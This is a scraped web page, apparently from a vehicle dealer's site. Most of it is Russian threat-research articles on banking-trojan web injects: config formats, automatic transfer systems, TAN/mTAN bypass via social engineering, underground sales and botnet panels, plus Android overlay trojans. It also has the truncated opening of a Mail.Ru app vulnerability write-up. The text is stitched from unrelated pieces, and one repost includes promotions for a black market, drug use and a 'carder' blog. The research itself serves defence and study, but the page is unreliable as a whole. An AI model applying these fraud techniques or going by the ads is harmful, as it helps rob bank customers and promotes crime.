Продажа квадроциклов, снегоходов и мототехники
second logo
Пн-Чт: 10:00-20:00
Пт-Сб: 10:00-19:00 Вс: выходной

+7 (812) 924 3 942

+7 (911) 924 3 942

Содержание

Эволюция веб-инжектов, часть 1 / Хабр

В настоящее время файлы веб-инжектов взяты на вооружение во многих банковских вредоносных программах и используются как средство для осуществления финансового мошенничества. Этот механизм работы вредоносных программ изначально был распространен в единичных экземплярах и находился в зависимости от того или иного семейства вредоносных программ. За последние несколько лет веб-инжекты стали использоваться как часть целой киберпреступной экосистемы, в которой независимые их разработчики продают свои изделия операторам ботнетов.

Такой рынок продажи подобных услуг можно наблюдать на многочисленных подпольных форумах, где мы видим все большее количество предложений от киберпреступников по продаже комплектов веб-инжектов. Они включают в себя все необходимые возможности для проведения банковского мошенничества, включая, механизмы обхода специальных мер безопасности, которые банки используют для обеспечения безопасности счетов пользователей.

Наше исследование посвящено исследованию самой природы веб-инжектов и их растущего рынка. Мы оглянемся назад и посмотрим, как веб-инжекты развивались с течением времени с самого начала, когда они были похожи на систему обычного фишинга и заканчивая автоматическими системами ATS, которые могут использоваться для обхода двухфакторной 2FA аутентификации.

На сегодняшний день оператор ботнета, для зарабатывания средств на мошеннических операциях, нуждается только во вредоносной программе, которая умеет внедрять вредоносное HTML-содержимое в легитимные веб-страницы браузера. Таким образом, ему, фактически, безразлично, каким образом будет реализован этот вредоносный механизм, ему важна только его эффективность. Поэтому для реализации этого алгоритма и его механизмов он может прибегнуть к услугам других киберпреступников, которые знают эту область гораздо лучше чем он и которые могут предложить для проведения мошеннических схем наилучшие услуги.

Введение

По сути веб-инжекты представляют из себя один из самых передовых инструментов, которые используют банковские троянские программы для проведения мошеннических операций с банковскими счетами пользователей. В последнее время банки стали использовать специальные механизмы безопасности, которые призваны защитить аккаунт или счет пользователя от несанкционированного доступа. Веб-инжекты также не стоят на месте, и их авторы адаптируют свои киберпреступные инструменты для нужд обхода этих механизмов безопасности. Продажа комплектов веб-инжектов на подпольных форумах наблюдается уже на протяжении нескольких лет.

Как мы знаем, последние несколько лет, пользователи все больше обращаются к услугам интернет-банкинга для проведения различных банковских операций. Киберпреступники также не стоят на месте и создают специальные вредоносные инструменты для компрометации компьютеров пользователей и их мобильных устройств. В самом начале своей эволюции, злоумышленники полагались на банковские трояны, которые содержали функции по компрометации нескольких финансовых учреждений и представляли из себя известные кейлоггеры (клавиатурные шпионы) и грабберы/похитители веб-форм. Оба этих средства использовались для кражи конфиденциальных данных аккаунтов интернет-банкинга.

Клавиатурные шпионы являются менее полезным, поскольку генерируют общий поток набранных пользователем с клавиатуры символов, из которых потом еще нужно будет вычленить искомые логин и пароль для доступа к аккаунту онлайн-банкинга. Эта задача ложилась на плечи операторов ботнета. Граббер форм стал очевидным выходом из этой ситуации, поскольку мог получать только интересующие злоумышленников данные, которые пользователь вводил в поддельную форму входа в аккаунт онлайн-банкинга. Далее захваченные данные отправлялись на удаленный сервер злоумышленников.

С точки зрения сегодняшнего дня, грабберы форм представляют из себя довольно устаревший способ захвата GET и POST запросов HTTP-протокола, с помощью которых данные форм отправляются на удаленный сервер. Хорошо известные и уже изученные банковские трояны Zeus и SpyEye были первыми, кто использовал механизм граббинга форм на основе перехватов API-функций в контексте процесса веб-браузера. Некоторые вредоносные программы использовали механизм граббинга форм на основе отслеживания сетевого потока трафика, который генерировался браузером. Использование механизма перехвата API-функций является для злоумышленников более предпочтительным вариантом, поскольку таким образом данные форм перехватываются еще до их непосредственного шифрования для последующей передачи на веб-сервер. Такой метод не лишен недостатков, поскольку является зависимым от конкретного браузера или его версии.

Современные вредоносные программы все реже используют эти устаревшие приемы, вместо этого они прибегают к услугам веб-инжектов, которые позволяют им более тонко настраивать и использовать вредоносную схему компрометации веб-страниц и похищения средств. Кроме этого, сами веб-инжекты позволяют модифицировать содержимое веб-страниц сайтов онлайн-банкинга, причем в зависимости от конкретного банка. Веб-инжекты позволяют злоумышленникам выполнять широкий спектр действий на скомпрометированной веб-странице, которую видит пользователь. Существует несколько комплектов веб-инжектов, выставленных на продажу на подпольных форумах, которые используют библиотеку JavaScript под названием jQuery.

Популярные банковские трояны Zeus и SpyEye были одними из первых, кто стал использовать веб-инжекты для компрометации конкретных банковских сайтов и модификации их содержимого. Содержимое веб-страницы можно модифицировать с использованием механизма перехвата API-вызовов. Это тот же способ, который используется вредоносными программами для организации граббинга форм. Банковский троян может инспектировать получаемое с сервера содержимое и модифицировать его на лету, перед непосредственным отображением этого содержимого в браузере. Подобная техника используется для обмана пользователя, который доверяет тому содержимому, которое отображает веб-браузер, при посещении им веб-страницы онлайн-банкинга. Такой метод известен как атака на пользователя под названием Man-in-the-Browser (MitB). Ниже на Рис. 1 показан пример реального действия веб-инжекта, результатом которого стало удаление текста с предупреждениями о финансовых мошенничествах.


Рис. 1. Вредоносная программа с использованием веб-инжекта удалила с веб-страницы служебную информацию (предупреждение системы онлайн-банкинга). Наверху вид оригинальной веб-страницу, внизу скомпрометированная веб-страница с удаленным текстом предупреждения.

Вредоносное содержимое, которое будет добавлено в веб-страницу, располагается в файле конфигурации веб-инжектов. Этот файл обычно скачивается зараженным компьютером с удаленного C&C-сервера. Такой способ передачи конфигурационного файла является очень удобным для злоумышленников, поскольку они могут модифицировать содержимое такого файла один раз на сервере и зараженные компьютеры в следующий раз получат уже модернизированную версию этого файла. Существуют различные форматы файлов конфигурации веб-инжектов, но один из них получил наибольшую популярность. Он использовался в банковском трояне SpyEye и со временем стал стандартом де-факто. На Рис. 2 показан пример конфигурационного файла веб-инжектов.


Рис. 2. Стандартный формат файла конфигурации веб-инжектов.

Как можно увидеть выше, первым параметром задается целевой URL-адрес, на котором должен сработать конкретный веб-инжект. Символы в строке после URL-адреса указывают банковскому трояну какое действие он должен предпринять при открытии пользователем этого адреса в браузере. В таблице 1 приведены значения этих служебных символов, а в таблице 2 указаны различные параметры (тэги) конфигурационного файла. Некоторые веб-инжекты являются довольно простыми и содержат функции подобные простому механизму фишинга, т. е. они внедряют в тело веб-страницы специальные поля, в которые пользователю предлагается ввести свои персональные и конфиденциальные данные. Пример такого веб-инжекта приведен на Рис. 3.


Таблица 1. Наиболее распространенные флаги параметра set_url.


Таблица 2. Наиболее распространенные тэги конфигурационного файла веб-инжектов.


Рис. 3. Пример вредоносного содержимого веб-страницы, которое специализируется на сборе персональной и конфиденциальной информации пользователя.

Automatic Transfer System (ATS)

С течением времени веб-инжекты становились все более специализированными и многофункциональными. Некоторые из них содержат специальные расширенные функции, которые помогают злоумышленникам выполнять мошеннические операции со счетом пользователя. Специальные скрипты, которые реализуют подобные операции, рассчитаны на обход защитных механизмов заданных веб-сайтов онлайн-банкинга. По мере развития веб-инжектов, системы безопасности сайтов банков также совершенствовались и в них добавлялись все новые функции для обнаружения вредоносной активности. На Рис. 4. можно увидеть пример веб-инжекта, в котором злоумышленники предусмотрели временные промежутки между вредоносными действиями для имитации человеческого поведения.


Рис. 4. Функция веб-инжекта, которая определяет логику использования временных задержек.

Как только мошеннический перевод со счета пользователя был совершен, веб-инжект скрывает проведенную операцию путем использования специальных механизмов. Под сокрытием понимается незаметная корректировка денежного баланса банковского счета. Таким образом пользователь остается в неведении того факта, что с его счета были похищены средства.

Популярность ATS атак снизилась в последнее время, поскольку снизился уровень соотношения сложности к успеху реализации (success-rate-to-complexity ratio). Мы все еще можем наблюдать использование ATS методов атак in-the-wild, но некоторые киберпреступники отказались от их использования в пользу тех атак, в которых используется «ручное управление». В таком случае злоумышленники просто берут скомпрометированный компьютер под свой контроль и выполняют мошеннические действия вручную.

Обход механизма Transaction Authorization Number (TAN)

С появлением банковских вредоносных программ, специалисты по безопасности банков начали внедрять в банковские ресурсы специальные дополнительные функции безопасности. Одной из наиболее популярных таких функций стала двухфакторная аутентификация, которая усиливала безопасность проведения транзакций.

Двухфакторная аутентификация повышает планку безопасности при проведении банковских операций за счет использования специальных кодов подтверждения. Такие коды могут быть получены пользователем в своем банке просто в форме списка, т. н. Transaction Authorization Numbers (TAN), либо в форме SMS-сообщения от банка, т. н. мобильные коды (mTAN). Если двухфакторная аутентификация включена, пользователь будет использовать полученные mTAN коды для подтверждения проводимой транзакции на веб-сайте онлайн-банкинга.

Для обхода механизма mTAN, злоумышленники могут заманить пользователя на установку специальной вредоносной программы для мобильного устройства, которая будет перехватывать SMS-сообщения, полученные от банка. Это может быть выполнено через методы социальной инженерии. Например, как только пользователь зайдет в аккаунт своего онлайн-банкинга через скомпрометированный веб-браузер, вредоносный код выполнит внедрение специального вредоносного содержимого на веб-страницу. Содержимое представляет из себя текст с просьбой предоставить информацию об используемом пользователем мобильном устройстве (Рис. 5.).


Рис. 5. Вредоносное содержимое веб-страницы, которое запрашивает информацию о мобильном устройстве.

После того как пользователь предоставит такую информацию, он получит на свое мобильное устройство SMS-сообщение со ссылкой на скачивание вредоносного приложения. Он может также воспользоваться QR-кодом для получения ссылки. После ее открытия, вредоносное ПО будет скачано на устройство, далее пользователь должен будет вручную запустить его установку. Эта процедура может состоять из нескольких этапов, например, злоумышленники могут внедрить в веб-страницу онлайн-банкинга такое содержимое, которое будет выступать как справочник по установке вредоносного ПО, шаг за шагом инструктируя пользователя. Как только вредоносное ПО будет установлено на мобильное устройство, оно сможет перенаправлять все полученные SMS-сообщения на телефон злоумышленников, предоставляя им возможность обхода mTAN кодов при проведении мошеннических действий со счетом пользователя. Банковские трояны Perkele и iBanking являются хорошо известными представителями вредоносного ПО с такими возможностями.

Так как банки стали использовать механизмы двухфакторной аутентификации, разработчики веб-инжектов были вынуждены адаптировать свои вредоносные инструменты для их обхода. Как было показано ниже, злоумышленники используют одну из форм социального инжиниринга для обмана пользователя и выманивания у него нужной информации, которая будет использоваться для обхода этих защитных мер.

Информация, которая стала нам доступна после отслеживания деятельности ботнетов вредоносных программ, предоставила нам картину тех методов, которыми пользуются злоумышленники для обхода схемы mTAN. Все они сводятся к одному общему принципу: отображение пользователю специального сообщения с вымышленной историей, которая привлечет его внимание. Злоумышленники отображают ее пользователю именно в тот момент, когда он входит в свой аккаунт онлайн-банкинга и полагает, что использует защищенное с сервером соединение и что все отображаемые браузером данные являются достоверными. Одна из таких историй основана на информации о том, что пользователю ошибочно была переведена определенная сумма денежных средств и он должен вернуть ее обратно. Такая схема становится возможной по той причине, что вредоносный код веб-инжекта может скорректировать отображаемый пользователю баланс денежных средств, введя его таким образом в заблуждение. Другая история строилась на том, что пользователю предлагалось «откалибровать» его мобильное устройство, выполнив тестовую денежную транзакцию.

На Рис. 6. показано поддельное сообщение вредоносной программы с просьбой ввести в текстовое поле код TAN из списка, который был выдан пользователю в банке. Как мы знаем, коды в таком списке пронумерованы, поэтому злоумышленники спрашивают код за определенным номером. Злоумышленники просят пользователя передать им код TAN в том случае, когда им нужно украсть со счета пользователя определенную сумму денег и подтвердить эту операцию механизмом 2FA. Фишинговое сообщение составляется как можно более убедительно для соответствующего воздействия на пользователя.

Нужно отметить, что существуют и другие веб-инжекты, которые нацелены не на компрометацию веб-сайтов финансовых учреждений и банков, а на компрометацию известных сервисов, например, Facebook, Twitter, Google, Yahoo. Такие веб-инжекты специализируются на краже у пользователей конфиденциальной или частной информации, например, номер кредитной карты или номер телефона. На Рис. 7 показан веб-инжект, который ориентирован на сервис известный сервис Twitter.


Рис. 7. Веб-инжект для сервиса Twitter.

Шифрование конфигурационных файлов веб-инжектов

Так как файлы конфигурации веб-инжектов содержат ключевую информацию для исследователей по безопасности и организаций CERT по всему миру, злоумышленники прямо заинтересованы в том, чтобы содержимое этих файлов не попало в их руки. Для этого к файлам применяются алгоритмы шифрования и обфускации.

На начальном этапе развития файлов веб-инжектов, злоумышленники не использовали шифрование и эти файлы передавались с удаленного сервера боту в открытом виде. После того как антивирусные компании обратили на банковские трояны более пристальное внимание и начали отслеживать появление этих конфигурационных файлов, злоумышленники начали использовать шифрование, делая процесс расшифровки содержимого сложнее с каждым шагом. Банковские трояны типа Zeus и его модификации, в настоящее время, используют несколько уровней шифрования, а сам расшифрованный файл хранят в памяти частями, а не целиком.

Компрессия или сжатие кода JavaScript может быть выполнена злоумышленника с помощью т. н. механизма /packer/, но в таком случае он может быть довольно быстро преобразован в оригинальный вид. Операция получения оригинального содержимого может быть выполнена с помощью простых перестановок функции «eval» и услуг сервиса JS beautifier. Этот метод компрессии является удобным, поскольку уменьшает размер содержимого веб-инжекта, но его очевидным недостатком является слабая защищенность содержимого. На Рис. 8. Показан фрагмент скрипта, который был сжат с использованием /packer/.


Рис. 8. Пример сжатого по механизму /packer/ скрипта.

Используемые злоумышленниками алгоритмы обфускации содержимого веб-инжектов могут значительно осложнить их анализ, поскольку деобфускация содержимого может представлять из себя нетривиальную задачу. На Рис. 9. показан пример такого обфусцированного содержимого.


Рис. 9. Пример обфусцированного веб-инжекта.

Рост количества банковских троянов, а также их сложности, неминуемо приведет к спросу на качественные веб-инжекты. Такой спрос уже обеспечен соответствующими предложениями на подпольных форумах кибепреступников.

Существуют ли веб-инжекты для Android?

Веб-инжекты

Существует целый класс атак, направленных на браузер пользователя, – Man-in-the-Browser («человек в браузере»). Для осуществления такой атаки могут использоваться и вредоносные библиотеки, и поддельные расширения, и более сложный вредоносный код, внедряемый в отдельные страницы браузера через подмену прокси-серверов или другим способом. Целью атаки Man-in-the-Browser может быть как достаточно «безобидная» подмена рекламы в социальных сетях и на популярных сайтах, так и хищение денежных средств со счетов пользователей, например, как это было в случае с Lurk.

В рамках атаки Man-in-the-Browser вредоносное расширение выдает себя за продукты «Лаборатории Касперского»

В большинстве случаев для атак вида Man-in-the-Browser на онлайн-банкинг используется веб-инжект — внедрение вредоносного кода в страницу сервиса онлайн-банкинга для перехвата одноразовой SMS, сбора информации о пользователе, подмены реквизитов и многого другого. Например, наши коллеги из Бразилии давно рассказывают об атаках по подмене штрих-кодов при печати Boleto-платёжек, распространённого метода оплаты услуг в их стране.

Однако в России популярность атак Man-in-the-Browser сейчас снижается: злоумышленники выбирают другие способы и векторы атак на банковских клиентов, обычному киберпреступнику разрабатывать и внедрять веб-инжекты гораздо сложнее, чем воспользоваться доступными готовыми инструментами.

Несмотря на это, нас нередко спрашивают – а существуют ли веб-инжекты для ОС Android? Мы попытались разобраться и полностью осветить этот вопрос.

На Android

Несмотря на то, что в отношении мобильных банковских троянцев также встречается употребление термина «инжект» (и даже сами злоумышленники иногда называют таким образом свои технологии кражи данных), работают они совсем по-другому. Для тех же целей, для которых компьютерные зловреды используют веб-инжекты, в мобильных троянцах используются две совсем иные технологии: перекрытие других приложений фишинговым окном и перенаправление с банковской веб-страницы на фишинговую.

Перекрытие приложений фишинговым окном

Это самая популярная у злоумышленников технология, ее используют практически все банковские троянцы. Впервые мы обнаружили зловреда, перекрывающего другие приложения своим фишинговым окном, в 2013 году, это был Trojan-Banker.AndroidOS.Svpeng.

Чаще всего современные мобильные банкеры перекрывают своим фишинговым окном приложение Google Play Store с целью кражи данных банковской карточки пользователя.

Зловред Marcher

Кроме того, троянцы часто перекрывают приложения различных социальных сетей и мессенджеров для кражи паролей от них.

Зловред Acecard

Но, конечно же, основной целью мобильных банковских троянцев являются финансовые приложения, в основном банковские.

Можно выделить три способа осуществления атаки Man-in-the-Browser в мобильной ОС:

1. Для перекрытия другого приложения используется специальное окно троянца, заранее подготовленное злоумышленниками. Такой способ, например, использовало семейство мобильных банковских троянцев Acecard.

Фишинговые окна Acecard

2. Использование для перекрытия приложения фишинговой веб-страницы, расположенной на сервере злоумышленников, что позволяет киберпреступникам в любой момент изменить ее содержимое. Этот способ используется в том числе в семействе мобильных банковских троянцев Marcher.

Фишинговая страницы Marcher

3. Загружаемая с сервера злоумышленников страничка-шаблон, в которую подставляются иконка и имя атакуемого приложения. Таким образом одна из модификаций Trojan-Banker.AndroidOS.Faketoken атакует более 2000 финансовых приложений.

Фишинговая страница FakeToken

Стоит отметить, что, начиная с Android 6 для работы описанного метода атаки троянцу FakeToken приходится дополнительно запрашивать права на отображение своего окна поверх других приложений. Но здесь он не одинок: параллельно с растущей популярностью новых версий Android все больше мобильных банковских троянцев начинает запрашивать эти права.

Перенаправление пользователя с банковской веб-страницы на фишинговую

Нам удалось обнаружить использование этой технологии только в семействе Trojan-Banker.AndroidOS.Marcher. Самые ранние образцы троянца, использующие перенаправление пользователя на фишинговую страницу, датируются концом апреля 2016, а самые поздние – первой половиной ноября 2016.

Перенаправление пользователя с банковской веб-страницы на фишинговую работает следующим образом: троянец подписывается на изменение закладок браузера, что включает в себя изменение текущей открытой страницы. Так зловред узнает, какая страница открыта пользователем в данный момент, и, если это одна из атакуемых страниц, зловред открывает соответствующую ей фишинговую страницу в том же браузере, переправляя туда пользователя. Нам удалось обнаружить более ста веб-страниц финансовых организаций, атакуемых семейством Marcher.

Однако стоит отметить два момента:

  • все новые модификации троянца Marcher, которые нам удалось обнаружить, больше не используют эту технологию.
  • те модификации, которые использовали эту технологию, также использовали перекрытие других приложений своим фишинговым окном.

Почему же только одно семейство мобильных банковских троянцев использовало перенаправление пользователя на фишинговую страницу, да и то в современных модификациях этого семейства данная технология больше не используется? На это есть несколько причин:

  • в Android 6 и более новых версиях эта технология больше не работает, т.е. количество потенциальных жертв снижается с каждым днем. Например, среди пользователей мобильных решений «Лаборатории Касперского» практически 30% используют Android 6 или более новую версию;
  • данная технология работала далеко не во всех мобильных браузерах;
  • пользователь может легко заметить процесс перенаправления на фишинговый сайт, к тому же он может обратить внимание на то, что адрес открытой страницы изменился.

Атаки с использование прав root

Воспользовавшись правами суперпользователя, троянцы могут осуществлять любые атаки, в том числе и настоящие веб-инжекты в браузер. Несмотря на то, что нам не удалось обнаружить ни одного такого случая, стоит отметить следующее:

  • Некоторые модули Backdoor.AndroidOS.Triada умеют подменять сайты в некоторых браузерах, воспользовавшись правами суперпользователя. Все обнаруженные нами атаки осуществлялись лишь с целью подзаработать на рекламе и не приводили к краже банковских данных.
  • Банковский троянец Trojan-Banker.AndroidOS.Tordow, воспользовавшись правами суперпользователя, может похитить сохраненные пароли из браузеров, среди которых могут быть и пароли от финансовых сайтов.

Выводы

Можно утверждать, что, несмотря на существующие технические возможности, для атак на банки киберпреступники не используют технологии веб-инжектов в мобильные браузеры и инжектов в мобильные приложения. Иногда они используют эти технологии для подмены рекламы, да и то в случае действительно сложного вредоносного ПО.

Скорее всего, причина, по которой киберпреступники игнорируют имеющиеся возможности, кроется в разнообразии мобильных браузеров и приложений. Создателям зловредов нужно адаптировать свои творения для слишком большого перечня программ, а это довольно затратно, тогда как более простые и универсальные атаки с фишинговыми окнами не требуют таких усилий и работают на большем числе пользователей.

Тем не менее, Triada и Tordow – показательный пример, свидетельствующий о том, что с развитием уровня подготовки создателей зловредов в будущем вполне можно ожидать подобных атак.

Эволюция веб-инжектов. Часть 2 – Telegraph

Темная сторона интернета

Файлы конфигурации веб-инжектов продаются различными лицами на подпольных хакерских форумах. Многие из этих лиц являются членами киберпреступных групп, либо имеют тесные связи с ними. Большинство кодеров веб-инжектов полагаются на один и тот же фиксированный формат конфигурационного файла (Рис.2). В то же время, некоторые авторы банковских троянов снабжают свои изделия специальными конвертерами различных форматов файлов веб-инжектов. Например, банковский троян Gataka содержит в своем составе подобный конвертер для преобразования конфигурационного файла стандартного типа (SpyEye) в свой внутренний формат.


Поскольку спрос на качественные веб-инжекты растет, их предложение со стороны авторов также увеличивается. Самим авторам веб-инжектов необходимы инструменты для облегчения процесса разработки и тестирования веб-инжектов. Примером такого инструмента является известный «билдер» или Config Builder, который был частью утекших исходных текстов Carberp. Он позволял задавать исходные параметров веб-инжекта на входе и получать конфигурационный файл на выходе.

Рис. 10. Реклама продажи дешевого веб-инжекта на подпольном хакерском форуме.

В общем случае, те веб-инжекты, которые выставляются на продажу, можно разделить на два больших типа. Веб-инжекты первого типа имеют в себе возможности по автоматической краже денежных средств и корректировке доступного баланса в личном кабинете. Второй тип веб-инжектов более прост и предлагает только схему компрометации веб-страниц на основе фишинговой поддельной формы сбора конфиденциальной информации. Некоторые разработчики веб-инжектов предлагают т. н. «кастомизацию», при которой клиенту предлагается необходимый набор услуг. Мы наблюдали случаи использования различных типов веб-инжектов в одной и той ж кампании по распространению банковской троянской программы. В этой кампании злоумышленникам удалось скомпрометировать компьютеры в нескольких странах мира.

Рис. 11. Продавец веб-инжекта банковского трояна Perkele предлагает свое изделие.

Мы наблюдали различные предложения веб-инжектов на подпольных форумах, некоторые из них стоили дороже, некоторые дешевле. На Рис. 10 показано предложение о продаже дешевого веб-инжекта. Несмотря на дешевизну предложения этого веб-инжекта, он охватывает большой спектр финансовых учреждений.

Указанный на скриншоте автор продавал веб-инжекты, которые специализировались в компрометации банков в разных странах мира. Предлагаемые им веб-инжекты могут быть куплены по $100 за каждый. Они имеют одинаковые функциональные возможности и предназначены для кражи личной и конфиденциальной информации пользователя с использованием фишинговых веб-форм.

Нами был обнаружен и более широкий спектр предложений продажи веб-инжектов, которые содержат механизм ATS, обход двухфакторной аутентификации, а также мобильный компонент для компрометации пользователей мобильных устройств. На Рис. 11 показано предложение мобильного бота Perkele, который поставляется в комплекте с веб-инжектом. Perkele позволяет обходить уже упоминавшийся нами механизм безопасности mTAN. Большинство продвинутых веб-инжектов поставляются с панелью управления, которая может использоваться для отслеживания состояния скомпрометированного вредоносным ПО компьютера.

Некоторые разработчики веб-инжектов предлагают специальные партнерские программы. На основе партнерских программ распространяются т. н. частные веб-инжекты, покупая которые заказчик вступает в специальную партнерскую программу. Подразумевается, что покупатель веб-инжекта может перепродать его и, кроме этого, продавец не будет предлагать этот веб-инжект другим киберпреступникам. Разумеется, что частные веб-инжекты стоят дороже их публичных аналогов. При этом увеличивается стоимость обслуживания и оказание помощи по использованию веб-инжектов (тех. поддержка).

Также встречаются авторы веб-инжектов, которые заинтересованы в партнерстве с киберпреступниками, занимающимися распространением троянских программ. Они просят определенный процент от прибыли, которую банковский троян приносят их владельцам. Одно из объявлений, которое мы наблюдали на подпольном форуме, приглашало к сотрудничеству владельцев ботнетов в Великобритании и Швеции. При этом условием для них выступало то, что часть прибыли с бизнеса киберпреступников должна была быть передана авторам веб-инжекта. 


Панели управления веб-инжектами

Как мы уже писали, с течением времени сложность веб-инжектов только росла. Для более удобного управления и контроля за ботами, которые используют веб-инжекты, злоумышленники стали использовать специальные панели управления. Панели управления продаются в комплекте с веб-инжектами и предоставляют операторам ботнетов единый интерфейс управления за ботами, они позволяют собирать и систематизировать конфиденциальную и другую информацию, украденную с помощью веб-инжектов. Кроме этого, панель управления позволяет киберпреступникам инструктировать ботов на проведение мошеннических операций.

В панели управления фиксируется состояние каждого бота, а также информация о текущем состоянии скомпрометированного банковского счета пользователя. Оператор ботнета может выполнить автоматическую транзакцию денежных средств со счета пользователя на один из подставных банковских аккаунтов, т. н. аккаунт «мула». Для выполнения такой операции, вредоносный JavaScript веб-инжекта должен иметь канал связи с панелью управления. При анализе случаев мошенничества с использованием банковских вредоносных программ, исследователям антивирусных компаний приходится взаимодействовать с панелью управления для получения статистики работы бота. Иногда через обращение к панели управления удается получить информацию об аккаунте мула и скачанном пользователем мобильном компоненте.

Панель управления отслеживает состояние каждого бота и регламентирует некоторые правила при удаленной работе с его компонентами. Например, она не позволит посетителю скачать мобильные компоненты ботов в том случае, если скомпрометированный пользователь еще им не воспользовался (бот не перешел в определенное состояние). Панель управления может содержать еще одну проверку перед доставкой мобильного бота. В случае с мобильным ботом выполняется проверка user-agent браузера мобильного устройства перед его непосредственной загрузкой.

Одним из примеров киберпреступной группы, которая специализируется на продаже как просто комплектов веб-инжектов, так и веб-инжектов с панелью управления, является т. н. «Yummba». Yummba специализируется и на продаже сложных комплектов веб-инжектов, которые позволяют обходить 2FA аутентификацию. На Рис. 12 и 13 показан интерфейс этой панели управления.

Рис. 12. Интерфейс входа в панель управления ботнетом.Рис. 13. Интерфейс панели управления ботнетом.

Эта группа предлагает как публичные так и частные комплекты веб-инжектов. Публичные комплекты веб-инжектов содержат в себе обширные возможности по компрометации различных банков и финансовых учреждений в Европе, Северной Америке и Австралии. В комплект входит специальный модуль, который может внедрять вредоносное содержимое в браузер для кражи персональной информации пользователя от различных банков. Он называется Full Information Grabber (FIGrabber). На Рис. 14 показан список банков, на которые нацелен комплект веб-инжектов группы Yummba.

Как упоминалось выше, Yummba предлагает специальный мобильный компонент вместе с веб-инжектом. Он используется для обхода двухфакторной аутентификации и перехвата кодов mTAN. Мобильный компонент представляет из себя вредоносную программу iBanking и предлагает более обширные возможности для киберпреступников чем Perkele. Эта группа также специализировалась на продаже других различных банковских троянов, включая, Qadars, ZeusVM, Neverquest.

Рис. 14. Список веб-сайтов банковских учреждений, на компрометацию которых нацелен модуль FIGrabber.

Другим популярным набором веб-инжектов является Injeria. Он также включает в себя панель управления ботами и является легко узнаваемым, так как использует идентичный набор параметров при загрузке внешних скриптов с C&C-сервера. В файле конфигурации список URL-адресов зашифрован. Ниже в таблице 3 указано описание используемых в файле конфигурации тэгов.

Таблица 3. Тэги конфигурационного файла Injeria.

Как видно из таблицы, кроме мобильного компонента, Injeria может использовать и другие методы для обхода механизмов безопасности банков. Тот факт, что скрипт извлекается с удаленного сервера, как и в случае других продвинутых веб-инжектов, свидетельствует о том, что автор или оператор ботнета сможет оперативно обновлять конфигурацию веб-инжекта для адаптирования его к изменяющейся среде. Этот комплект веб-инжектов используется рядом банковских троянов, включая, Qadars, Tilon, Torpig, Citadel. 

Существуют и другие предложения веб-инжектов, отличных от тех, что были указаны выше. Один из таких комплектов предлагался на подпольном форуме пользователем под псевдонимом «rgklink». Этот пользователь форума также специализируется на продаже различных веб-инжектов, которые используются для компрометации финансовых учреждений во многих странах мира. Совместно с веб-инжектами типа ATS им предлагалась и панель управления под названием Scarlett (Рис. 15).

Рис. 15. Панель управления Scarlett.Рис. 16. Пример веб-инжект Injeria.

В таблице ниже приведены расценки на веб-инжекты rgklink, которые были актуальны по состоянию на 2013 г. Как видно, стоимость веб-инжекта варьируется в зависимости от возможностей, которые он может реализовать.

Таблица 4. Стоимость различных функций веб-инжектов.

В большинстве случаев веб-инжекты загружаются ботом с его удаленного C&C-сервера. Однако, злоумышленники стали использовать еще один уровень в цепочке доставки веб-инжекта боту. Речь идет о том, что с C&C-сервера бот загружает не сам веб-инжект, а ссылку на него. На Рис. 15 представлен такой тип веб-инжекта.

Как мы уже упоминали выше, загрузка веб-инжекта с внешнего сервера имеет свои явные преимущества для злоумышленников. Основное преимущество заключается в том, что им достаточно один раз обновить файл конфигурации на удаленном сервере и быть уверенными, что все боты получат именно его. Другое неявное преимущество заключается в том, что удаленное хранение файла усложняет проведение криминалистической экспертизы для антивирусных аналитиков. Злоумышленники могут просто на время отключить удаленный сервер, делая невозможным процесс извлечения оттуда файла конфигурации.

Рис. 17. Пример взаимодействия клиентской и серверной частей веб-инжекта.

Существуют пакеты веб-инжектов, которые полагаются на взаимодействие с удаленным C&C-сервером намного в большей степени. В таком случае удаленный сервер сам решает какое содержимое должно быть внедрено в веб-страницу. В одном из таких пакетов, веб-инжект находится в постоянном контакте с сервером, который постоянно передает ему новые фрагменты вредоносного кода JavaScript. Он использует уникальное, обфусцированное имя функции и cookie для сохранения и синхронизации служебных данных между веб-страницами. На рис. 17 показано взаимодействие между таким веб-инжектом и управляющим сервером. Видно, что один из URL параметров «func=» содержит имя функции, которое затем будет отправлено назад на сервер, после чего ее содержимое будет добавлено к оригинальной веб-странице и автоматически исполнено. На рис. 18 показана функция, которая отвечает за запрос новых фрагментов JavaScript с сервера и их последующую вставку в тело веб-страницы.

Рис. 18. Функция веб-инжекта, которая отвечает за исполнение инструкций, отправленных с удаленного сервера.

В наблюдаемом нами случае фрагменты кода JavaScript, которые были загружены с C&C-сервера, выполняют установку различных переменных и могут изменять текущее «состояние» скомпрометированной системы. Такие состояния могут быть следующими: ожидает (wait), заблокирован (block), tan, az. Последнее az является сокращением от названия российской системы веб-инжектов (ATS) под названием avtozalivov. Интересно, что информация об аккаунте для перевода денежных сумм (DropId) также отправляется злоумышленникам с использованием метода, описанного выше. На рис. 19 показан пример этой информации.

Рис. 19. Информация DropID, которая была отправлена удаленным сервером веб-инжекту.

Разумеется, описанный выше метод не является уникальным для конкретного набора веб-инжектов. Можно отметить, что это довольно редкий случай, когда информация о счете злоумышленников, на который будут переведена денежная сумма (счет мула), непосредственно передается в веб-инжект. Обычно такая операция происходит в конце процесса взаимодействия веб-инжекта с удаленным C&C-сервером. Это обусловлено чисто практическими соображениями, поскольку злоумышленники в самую последнюю очередь заинтересованы в тиражировании своих банковских реквизитов. Очевидно, что такая информация может сразу попасть в руки правоохранительных органов.

Источник: habr.com

Черный Рынок — название говорит само за себя. Оригинальная одежда и техника за половину стоимости.

Дурман — наркотики и их медицинское употребление, увлекательные трип-репорты, виды веществ, их свойства и последствия употребления.

привет, я Марк — мой личный блог, будни злого кардера-алкоголика. Спасибо за внимание!

➖🔥Читай все самые интересные статьи о Темной Стороне Интернета на канале @deeptoweb 🔥

Инжект для робота. Вскрываем почтовое приложение от Mail.Ru для Android — «Хакер»

Содержание статьи

Случайным образом, копая очередной BugBounty, я натолкнулся на цепочку уязвимостей в достаточно популярном почтовом клиенте от IT-гиганта Mail.Ru. Эксплуатация уязвимостей из этой цепочки не требовала на устройстве особых прав и могла привести к полной компрометации содержимого почтового ящика жертвы или даже содержимого SD-карты. В статье я опишу методы, с помощью которых были найдены эти уязвимости, вспомогательные тулзы и финальный вектор с демонстрацией на видео.

 

Поехали!

Первым делом понадобится, конечно, девайс (или эмулятор), Android SDK tools, нужный нам APK, drozer и набор мелких утилит для декомпиляции и разбора Java-кода. Но обо всем по порядку.

